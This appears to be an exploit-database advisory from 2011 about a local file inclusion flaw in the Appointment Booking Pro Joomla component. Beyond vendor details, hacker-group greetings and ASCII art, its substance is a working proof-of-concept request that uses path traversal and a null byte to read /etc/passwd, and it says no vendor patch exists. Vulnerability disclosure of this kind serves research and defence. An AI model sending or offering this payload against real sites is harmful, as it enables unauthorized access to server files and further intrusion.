Appointment Booking Pro Joomla Component LFI Vulnerability



EKU-ID: 747 CVE: OSVDB-ID:
Author: Don Tukulesto Published: 2011-07-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Appointment Booking Pro is a native Joomla component
=================================
Last login: Tue Jun  7 2010 10:20:22 on ttys000
                                 ______                                 ___
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/|
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/

Author  : Don Tukulesto (root@indonesiancoder.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>)
Homepage : http://indonesiancoder.com
Published : July 17, 2011
Tested On : OS X 10.5.8
=================================


=================================
| Software Info  |
=================================
[>] Vendor      : http://www.appointmentbookingpro.com/
[>] Software    : Appointment Booking Pro - ABPro
       Appointment Booking Pro is an appointment booking or scheduling, web site component.
[>] Cost        : $59

I. Proof of Concept
=================================
index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================
Currently manufacturers do not provide patches or upgrades.


=================================

[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n

We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC

=================================